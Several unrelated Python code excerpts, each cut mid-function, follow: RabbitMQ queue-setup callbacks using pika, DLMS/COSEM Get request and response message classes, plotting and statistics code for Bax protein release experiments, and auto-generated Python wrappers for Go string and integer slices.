def setup_queue(self, queue_name):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
:param str|unicode queue_name: The name of the queue to declare.
"""
LOGGER.info('Declaring queue %s', queue_name)
if self._type == 'consumer' and self.EXCHANGE_TYPE == 'x-modulus-hash':
if not self._was_consuming:
self.start_consuming()
else:
args = {}
if self.DL_EXCHANGE:
args['x-dead-letter-exchange'] = self.DL_EXCHANGE
self._channel.queue_declare(
durable=self._durable,
passive=self._passive,
queue=queue_name,
arguments=args,
callback=self.on_queue_declareok)
@exception_catch
def setup_ae_queue(self, queue_name):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
:param str|unicode queue_name: The name of the queue to declare.
"""
LOGGER.info('Declaring queue %s', queue_name)
self._channel.queue_declare(
durable=False,
passive=self._passive,
queue=queue_name,
callback=self.on_ae_queue_declareok)
@exception_catch
def setup_dl_queue(self, queue_name):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
:param str|unicode queue_name: The name of the queue to declare.
"""
LOGGER.info('Declaring queue %s', queue_name)
self._channel.queue_declare(
durable=False,
passive=self._passive,
queue=queue_name,
callback=self.on_dl_queue_declareok)
@exception_catch
def on_queue_declareok(self, _unused_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange together with the routing key by issuing the Queue.Bind
RPC command. When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
LOGGER.info('Binding %s to %s with %s', self.EXCHANGE, self.QUEUE,
self.ROUTING_KEY)
self._channel.queue_bind(
self.QUEUE,
self.EXCHANGE,
routing_key=self.ROUTING_KEY,
callback=self.on_bindok)
@exception_catch
def on_ae_queue_declareok(self, _unused_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange together with the routing key by issuing the Queue.Bind
RPC command. When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
LOGGER.info('Binding %s to %s with %s', self.AE_EXCHANGE, self.AE_QUEUE,
self.ROUTING_KEY)
self._channel.queue_bind(
self.AE_QUEUE,
self.AE_EXCHANGE,
routing_key=self.ROUTING_KEY,
callback=self.on_bindok)
@exception_catch
def on_dl_queue_declareok(self, _unused_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange together with the routing key by issuing the Queue.Bind
RPC command. When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
LOGGER.info('Binding %s to %s with %s', self.DL_EXCHANGE, self.DL_QUEUE,
self.ROUTING_KEY)
self._channel.queue_bind(
self.DL_QUEUE,
self.DL_EXCHANGE,
routing_key=self.ROUTING_KEY,
callback=self.on_bindok)
def on_bindok(self, unused_frame):
"""Invoked by pika when the Queue.Bind method has completed. At this
point we will start consuming messages by calling start_consuming
which will invoke the needed | |
from functools import partial
from typing import *
import attr
import dlms_cosem.utils
from dlms_cosem import a_xdr, cosem, dlms_data
from dlms_cosem import enumerations as enums
from dlms_cosem.cosem import selective_access
from dlms_cosem.dlms_data import (
VARIABLE_LENGTH,
AbstractDlmsData,
DlmsDataFactory,
decode_variable_integer,
encode_variable_integer,
)
from dlms_cosem.protocol.xdlms.base import AbstractXDlmsApdu
from dlms_cosem.protocol.xdlms.invoke_id_and_priority import InvokeIdAndPriority
get_request_type_from_bytes = partial(enums.GetRequestType.from_bytes, byteorder="big")
get_response_type_from_bytes = partial(
enums.GetResponseType.from_bytes, byteorder="big"
)
class NullValue:
def __call__(self):
return None
def if_falsy_set_none(value):
if value:
return value
@attr.s(auto_attribs=True)
class GetRequestNormal(AbstractXDlmsApdu):
"""
Represents a Get request.
Get requests are modeled with a choice but we only support the normal one.
Get requests work in single attributes on interface classes.
To get a value you would need the interface class, the instance (OBIS) and the
attribute id.
Some attributes allow for selective access to the attributes. For example a load
profile might be read from a specific date or a specific entry.
"""
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.NORMAL
cosem_attribute: cosem.CosemAttribute = attr.ib(
validator=attr.validators.instance_of(cosem.CosemAttribute)
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
access_selection: Optional[
Union[selective_access.RangeDescriptor, selective_access.EntryDescriptor]
] = attr.ib(default=None, converter=if_falsy_set_none)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.NORMAL:
raise ValueError(
"The data for the GetRequest is not for a GetRequestNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
cosem_attribute_data = data[:9]
cosem_attribute = cosem.CosemAttribute.from_bytes(cosem_attribute_data)
data = data[9:]
has_access_selection = bool(data.pop(0))
if has_access_selection:
access_selection = selective_access.AccessDescriptorFactory.from_bytes(data)
else:
access_selection = None
return cls(
cosem_attribute=cosem_attribute,
invoke_id_and_priority=invoke_id_and_priority,
access_selection=access_selection,
)
def to_bytes(self):
# automatically adding the choice for GetRequestNormal.
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE.value)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(self.cosem_attribute.to_bytes())
if self.access_selection:
out.extend(b"\x01")
out.extend(self.access_selection.to_bytes())
else:
out.extend(b"\x00")
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestNext(AbstractXDlmsApdu):
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.NEXT
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.NEXT:
raise ValueError("The data for the GetRequest is not for a GetRequestNext")
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
assert len(data) == 4 # should only be block number left.
block_number = int.from_bytes(data, "big")
return cls(block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(self.block_number.to_bytes(4, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestWithList(AbstractXDlmsApdu):
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.WITH_LIST
cosem_attributes_with_selection: List[cosem.CosemAttributeWithSelection]
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.WITH_LIST:
raise ValueError(
"The data for the GetRequest is not for a GetRequestWithList"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
number_of_items = data.pop(0)
cosem_atts = list()
for i in range(0, number_of_items):
# Not really happy with the format of this but it works fine.
c = cosem.CosemAttributeWithSelection.from_bytes(data)
cosem_atts.append(c)
data = data[len(c.to_bytes()) :]
return cls(
cosem_attributes_with_selection=cosem_atts,
invoke_id_and_priority=invoke_id_and_priority,
)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(
encode_variable_integer(len(self.cosem_attributes_with_selection))
) # number of items
for item in self.cosem_attributes_with_selection:
out.extend(item.to_bytes())
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestFactory:
"""
The factory will parse the GetRequest and return either a GetRequestNormal,
GetRequestNext or a GetRequestWithList.
"""
TAG: ClassVar[int] = 192
@staticmethod
def from_bytes(source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != GetRequestFactory.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be "
f"{GetRequestFactory.TAG}"
)
request_type = enums.GetRequestType(data.pop(0))
if request_type == enums.GetRequestType.NORMAL:
return GetRequestNormal.from_bytes(source_bytes)
elif request_type == enums.GetRequestType.NEXT:
return GetRequestNext.from_bytes(source_bytes)
elif request_type == enums.GetRequestType.WITH_LIST:
return GetRequestWithList.from_bytes(source_bytes)
else:
raise ValueError(
f"Received an enum request type that is not valid for "
f"GetRequest: {request_type}"
)
@attr.s(auto_attribs=True)
class GetResponseNormal(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.NORMAL
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
return cls(bytes(data), invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.append(self.invoke_id_and_priority.to_bytes())
out.append(0) # data result choice
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseNormalWithError(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.NORMAL
error: enums.DataAccessResult = attr.ib(
validator=attr.validators.instance_of(enums.DataAccessResult)
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
choice = data.pop(0)
if choice != 1:
raise ValueError(
f"The data choice is not 1 to indicate error but: {choice}"
)
error = enums.DataAccessResult(data.pop(0))
return cls(error, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # data error choice
out.extend(self.error.to_bytes(1, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseWithBlock(AbstractXDlmsApdu):
"""
The data sent in a block response is an OCTET STRING. Not instance of DLMS Data.
So it has the length encoding first.
"""
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if last_block:
raise ValueError(
f"Last block set to true in a GetResponseWithBlock. Should only be set "
f"for a GetResponseLastBlock"
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
return cls(bytes(data), block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(0) # last block == False
out.extend(self.block_number.to_bytes(4, "big"))
out.append(0) # data choice = data
out.extend(
dlms_cosem.dlms_data.encode_variable_integer(len(self.data))
) # octet string length
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseLastBlock(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if not last_block:
raise ValueError(
f"Last block is not set to true in a GetResponseLastBlock."
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
return cls(bytes(data), block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # last block == True
out.extend(self.block_number.to_bytes(4, "big"))
out.append(0) # data choice = data
out.extend(
dlms_cosem.dlms_data.encode_variable_integer(len(self.data))
) # octet string length
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseLastBlockWithError(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
error: enums.DataAccessResult = attr.ib(
validator=attr.validators.instance_of(enums.DataAccessResult)
)
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
| |
plt.text(2.05, means[i, 1], nbd_sites[i], color='k',
fontsize=8)
plt.xlim(0.5, 2.5)
def plot_bid_vs_bim_release(df, nbd_sites, dtype='Release',
file_basename=None):
replicates = range(1, 4)
activators = ['Bid', 'Bim']
# Get the length of the timecourses
for nbd_index, nbd_site in enumerate(nbd_sites):
color_ix = 0
for act_ix, activator in enumerate(activators):
# Initialization for WT
wt_slice = df[activator][dtype]['WT']
wt_numpts = wt_slice.shape[0]
wt_y = np.zeros((wt_numpts, len(replicates)))
# Initialization for mutant
mut_slice = df[activator][dtype][nbd_site]
mut_numpts = mut_slice.shape[0]
mut_y = np.zeros((mut_numpts, len(replicates)))
# Iterate over reps and get data
for rep_ix, rep_num in enumerate(replicates):
# Only get the time coordinates for the first rep
if rep_ix == 0:
wt_time = wt_slice[rep_num]['TIME'].values
mut_time = mut_slice[rep_num]['TIME'].values
wt_y[:, rep_ix] = wt_slice[rep_num]['VALUE'].values
mut_y[:, rep_ix] = mut_slice[rep_num]['VALUE'].values
# Now get the averages and SDs
wt_avg = np.mean(wt_y, axis=1)
wt_sd = np.std(wt_y, axis=1, ddof=1)
wt_ubound = wt_avg + wt_sd
wt_lbound = wt_avg - wt_sd
mut_avg = np.mean(mut_y, axis=1)
mut_sd = np.std(mut_y, axis=1, ddof=1)
mut_ubound = mut_avg + mut_sd
mut_lbound = mut_avg - mut_sd
#num_colors = 4
#colors = plt.cm.Set3(np.linspace(0, 1, num_colors))
colors = ['r', 'm', 'b', 'g']
fig_name = 'bid_bim_tc_comp_%s' % nbd_site
# Plot the ratio
plt.figure(fig_name, figsize=(10, 10))
plt.subplot(1, 2, 1)
(ratio_avg, ratio_sd) = \
calc_ratio_mean_sd(mut_avg, mut_sd, wt_avg, wt_sd)
plt.plot(wt_time, ratio_avg, color=colors[color_ix],
label=activator)
plt.fill_between(wt_time, ratio_avg + ratio_sd,
ratio_avg - ratio_sd, alpha=0.5,
color=colors[color_ix])
plt.legend(loc='upper right', fontsize=10)
plt.ylim(0, 5)
# Plot the raw timecourses for WT and mutant
# Plot the mutant
plt.subplot(1, 2, 2)
plt.plot(wt_time, mut_avg, color=colors[color_ix],
label='%s, NBD-%sC-Bax' % (activator, nbd_site))
plt.fill_between(wt_time, mut_ubound, mut_lbound,
color=colors[color_ix], alpha=0.2)
color_ix += 1
# Plot the WT
plt.plot(wt_time, wt_avg, color=colors[color_ix],
label='%s, WT Bax' % activator)
plt.fill_between(wt_time, wt_ubound, wt_lbound,
color=colors[color_ix], alpha=0.3)
plt.legend(loc='lower right', fontsize=10)
color_ix += 1
if file_basename:
plt.savefig('%s_%s.pdf' % (file_basename, fig_name))
plt.savefig('%s_%s.png' % (file_basename, fig_name))
def calc_release_peaks(df, nbd_sites, activators=None, replicates=None,
window=1, csv_filename=None):
"""Measure the lag phase of the release data.
Takes the derivative of the release data for the given set of
activators, NBD sites, and replicates, and gets the time associated
with the peak of the derivative.
Returns
-------
Dictionary containing keys of the form (activator, nbd_site, replicate)
mapped to the times of the maximum rate of release.
"""
# Set some defaults
if activators is None:
activators = ['Bid', 'Bim']
if replicates is None:
replicates = range(1, 4)
peak_dict = collections.OrderedDict()
# Initialize the filter
b, a = scipy.signal.butter(1, 0.2)
for activator, nbd_site, rep_index in \
itertools.product(activators, nbd_sites, replicates):
key = (activator, nbd_site, rep_index)
# Get the data
rt = df[(activator, 'Release', nbd_site,
rep_index, 'TIME')].values
ry = df[(activator, 'Release', nbd_site,
rep_index, 'VALUE')].values
# Apply the filter
# Filter the timecourse
r_filt = scipy.signal.filtfilt(b, a, ry)
r_avg = moving_average(r_filt, n=window)
# Take the derivative
r_diff = np.diff(r_avg)
# When we take the derivative, the size of the array shrinks by
# one, because we are calculating the differences between neighboring
# elements. So if the data is [0, 1, 3, 4, 5], the derivatives will
# be [1, 2, 1, 1], and the maximum of the derivative array will be at
# index 1, which corresponds to the difference of two and the entry of
# three in the original array. If we adopt the convention that the
# index to use for the maximum slope is the latter of the two values
# used in calculating the difference, this means we need to add one to
# the index associated with the maximum value of the diff array.
r_max_tpt = np.argmax(r_diff) + 1
peak_dict[key] = rt[r_max_tpt]
if csv_filename:
with open(csv_filename, 'w') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
for key, value in peak_dict.iteritems():
line = list(key)
line.append(value)
csv_writer.writerow(line)
return peak_dict
def plot_example_derivatives(df, activator, nbd_site, rep_index, window=1,
normalize_nbd=False, plot_filename=None,
plot_tb_peak=False):
set_fig_params_for_publication()
# Create an order 3 lowpass butterworth filter.
b, a = scipy.signal.butter(1, 0.2)
# RELEASE DERIVATIVE
rt = df[(activator, 'Release', nbd_site, rep_index, 'TIME')].values
ry = df[(activator, 'Release', nbd_site, rep_index, 'VALUE')].values
# Filter the timecourse
r_filt = scipy.signal.filtfilt(b, a, ry)
r_avg = moving_average(r_filt, n=window)
# Take the derivative
r_diff = np.diff(r_avg)
# Peak release derivative
r_max_tpt = np.argmax(r_diff) + 1
peak_pt = rt[r_max_tpt]
# NBD DERIVATIVE
nt = df[(activator, 'NBD', nbd_site, rep_index, 'TIME')].values
ny = df[(activator, 'NBD', nbd_site, rep_index, 'VALUE')].values
# Normalize NBD to F/F0
if normalize_nbd:
ny = ny / float(ny[0])
# Filter
n_filt = scipy.signal.filtfilt(b, a, ny)
n_avg = moving_average(n_filt, n=window)
# Take derivative
n_diff = np.diff(n_avg)
# PLOT
fig = plt.figure(figsize=(1.5, 1.5), dpi=300)
ax = fig.gca()
n_diff_norm = n_diff / np.max(np.abs(n_diff))
r_diff_norm = r_diff / np.max(np.abs(r_diff))
ax.plot(nt[1+window-1:], n_diff_norm, label=r'$\frac{d}{dt}$ NBD')
ax.plot(rt[1+window-1:], r_diff_norm, color='r',
label=r'$\frac{d}{dt}$ Tb')
ax.set_xlabel('Time (sec)')
ax.set_ylabel(r'\% Max Rate')
#ax.set_title('%s, NBD-%s-Bax normalized derivative' % (activator, nbd_site))
ax.set_ylim(-0.25, 1.1)
(xmin, xmax) = (0, 2000)
ax.set_xlim(xmin, xmax)
plt.hlines(0, xmin, xmax, linestyle='-')
plt.subplots_adjust(left=0.27, bottom=0.19)
plt.legend(loc='upper right', fontsize=fontsize, frameon=False)
ymin, ymax = plt.ylim()
format_axis(ax)
if plot_tb_peak:
plt.vlines(peak_pt, ymin, ymax, color='gray', alpha=0.5)
if plot_filename:
plt.savefig('%s.pdf' % plot_filename)
plt.savefig('%s.png' % plot_filename, dpi=300)
def plot_derivatives(df, nbd_sites, normalize_nbd=False):
replicates = range(1, 4)
num_pts = 4
window = 1 # For moving average
activators = ['Bid', 'Bim']
# Create an order 3 lowpass butterworth filter.
b, a = scipy.signal.butter(1, 0.2)
for nbd_index, nbd_site in enumerate(nbd_sites):
for activator in activators:
# We store the list of timepoints where the release derivative
# reaches its peak so that we can plot lines for all three with
# the same upper and lower y-coordinates.
peak_pts = []
for rep_index in replicates:
rt = df[(activator, 'Release', nbd_site,
rep_index, 'TIME')].values
ry = df[(activator, 'Release', nbd_site,
rep_index, 'VALUE')].values
# Filter the timecourse
r_filt = scipy.signal.filtfilt(b, a, ry)
r_avg = moving_average(r_filt, n=window)
# Take the derivative
r_diff = np.diff(r_avg)
# See comment in calc_release_peaks, above
r_max_tpt = np.argmax(r_diff) + 1
peak_pts.append(rt[r_max_tpt])
# Calculate max NBD slope, but not for WT
if nbd_site != 'WT':
nt = df[(activator, 'NBD', nbd_site,
rep_index, 'TIME')].values
ny = df[(activator, 'NBD', nbd_site,
rep_index, 'VALUE')].values
# Normalize NBD to F/F0
if normalize_nbd:
ny = ny / float(ny[0])
# Filter
n_filt = scipy.signal.filtfilt(b, a, ny)
n_avg = moving_average(n_filt, n=window)
# Take derivative
n_diff = np.diff(n_avg)
# Terbium subplot
plt.figure('%s, NBD-%s-Bax derivative' % (activator, nbd_site),
figsize=(12, 5))
plt.subplot(1, 2, 1)
plt.plot(rt[1+window-1:], r_diff, color=rep_colors[rep_index],
label='%s Rep %d' % (activator, rep_index))
plt.ylabel('dRel/dt (% rel $sec^{-1}$)')
plt.title('%s, NBD-%s-Bax, Tb derivative' %
(activator, nbd_site))
plt.legend(loc='upper right')
if nbd_site != 'WT':
# NBD subplot
plt.subplot(1, 2, 2)
plt.plot(nt[1+window-1:], n_diff,
color=rep_colors[rep_index],
label='%s Rep %d' % (activator, rep_index))
plt.xlabel('Time (sec)')
plt.ylabel('dNBD/dt ($F/F_0\ sec^{-1}$)')
plt.title('%s, NBD-%s-Bax, NBD derivative' %
(activator, nbd_site))
plt.legend(loc='upper right')
# Plot normalized derivatives
plt.figure('%s, NBD-%s-Bax normalized derivative' %
(activator, nbd_site))
n_diff_norm = n_diff / np.max(np.abs(n_diff))
r_diff_norm = r_diff / np.max(np.abs(r_diff))
plt.plot(rt[1+window-1:], r_diff_norm,
color=rep_colors[rep_index],
linestyle=line_styles[2],
label='%s Rep %d' % (activator, rep_index))
plt.plot(nt[1+window-1:], n_diff_norm,
color=rep_colors[rep_index],
linestyle=line_styles[3])
plt.xlabel('Time (sec)')
plt.ylabel('% max rate')
plt.title('%s, NBD-%s-Bax normalized derivative' %
(activator, nbd_site))
plt.legend(loc='upper right')
# Add vertical lines to the normalized derivative plot
plt.figure('%s, NBD-%s-Bax normalized derivative' %
(activator, nbd_site))
ymin, ymax = plt.ylim()
plt.vlines(peak_pts, ymin, ymax)
# Call tight_layout for the Tb/NBD 2-panel figure
plt.figure('%s, NBD-%s-Bax derivative' % (activator, nbd_site))
plt.tight_layout()
def welch_t_test(means1, sds1, means2, sds2):
n1 = 3
n2 = 3
t_numer = means1 - means2
sq_sum = ((sds1**2)/n1) + ((sds2**2)/n2)
t_denom = np.sqrt(sq_sum)
t = t_numer / t_denom
print t
v_numer = sq_sum ** 2
v1 = n1 - 1.0
v2 = n2 - 1.0
v_denom = ((sds1 ** 4) / ((n1**2) * v1)) / ((sds2 ** 4) / ((n2**2) * v2))
v = v_numer / v_denom
print v
p_val = scipy.stats.t.sf(t, v)
print p_val
def student_t_test(means1, sds1, means2, sds2, n):
n = float(n)
t_numer = np.abs(means1 - means2)
sx1x2 = np.sqrt(0.5*(sds1**2 + sds2**2))
t_denom = sx1x2 * np.sqrt(2/n)
t = t_numer / t_denom
print t
p_val = scipy.stats.t.sf(t, n - 1)
print p_val * 2
return p_val * 2
# -- Model fits --
params_dict = {'c1_to_c2_k': 1e-4, 'c1_scaling': 2,
'c0_to_c1_k': 2e-3}
def plot_2conf_fits(df, nbd_sites, activator, dtype='NBD', replicates=None,
normalize_nbd=False):
if replicates is None:
replicates = range(1, 4)
fit_results = []
# Filter out the WT residue, if present in the list
nbd_sites_filt = [s for s in | |
go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []string
class Slice_string(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=A Go-side object is always initialized with an explicit handle=arg
otherwise parameter is a python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_string_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_string.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_string len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_string([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_string_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step == None or key.step == 1:
st = key.start
ed = key.stop
if st == None:
st = 0
if ed == None:
ed = _tsubasa.Slice_string_len(self.handle)
return Slice_string(handle=_tsubasa.Slice_string_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_string_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_string_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_string.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_string_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_string_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []uint
class Slice_uint(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=A Go-side object is always initialized with an explicit handle=arg
otherwise parameter is a python list that we copy from
